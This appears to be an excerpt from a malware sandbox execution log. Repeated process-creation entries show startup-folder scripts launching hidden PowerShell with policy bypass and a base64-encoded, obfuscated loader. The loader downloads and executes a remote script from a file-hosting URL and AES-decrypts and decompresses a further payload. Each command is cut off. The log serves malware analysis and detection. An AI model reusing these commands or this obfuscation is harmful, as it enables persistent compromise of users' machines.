                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 